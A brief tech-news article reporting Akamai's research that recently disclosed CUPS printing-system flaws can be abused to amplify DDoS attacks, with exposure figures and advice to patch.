The recently disclosed Common UNIX Printing System (CUPS) vulnerability could be even worse than expected, following new claims that it can be exploited to amplify distributed denial of service (DDoS) attacks.
Akamai researchers have claimed that the attacks could have an amplification factor of 600x – for an average attack, a worrying prospect for victims everywhere.
CUPS is an open-source printing system developed by Apple for Unix-like operating systems, including Linux and macOS. It provides a standardized way to manage print jobs and queues, supporting both local and network printers. CUPS uses the Internet Printing Protocol (IPP) as its primary protocol, allowing seamless printer discovery and job submission over networks. It also includes a web-based interface for managing printers, print jobs and configurations.
Infinite loop
CUPS was recently found to have four flaws: CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177. When linked together, these threat actors can create fake, malicious printers. that CUPS can discover. All the crooks have to do is send a specially crafted packet to trick the CUPS server. The moment a user tries to print something with this new device, a malicious command is executed locally on their device.
In contrast, Akamai’s experts claim that every packet sent to flawed CUPS servers causes them to generate larger IPP/HTTP requests directed at the targeted device. As a result, both CPU and bandwidth resources are gobbled up, in classic DDoS fashion. Their research found that there are almost 200,000 devices exposed to the internet, of which almost 60,000 could be used for DDoS campaigns.
In extreme cases, CUPS servers continue to send requests, causing them to enter an infinite loop.
“In the worst case scenario, we observed what appeared to be an endless stream of connection attempts and requests as a result of a single probe. These streams appear to have no end and will continue until the daemon is killed or restarted,” Akamai explained it out. “Many of these systems we observed during testing received thousands of requests and sent them to our testing infrastructure. In some cases, this behavior appeared to continue indefinitely.”
The DDoS amplification attack can be carried out in just a few minutes, for virtually no money. IT teams are urged to apply the fix for the above errors as soon as possible.
Via BleepingComputer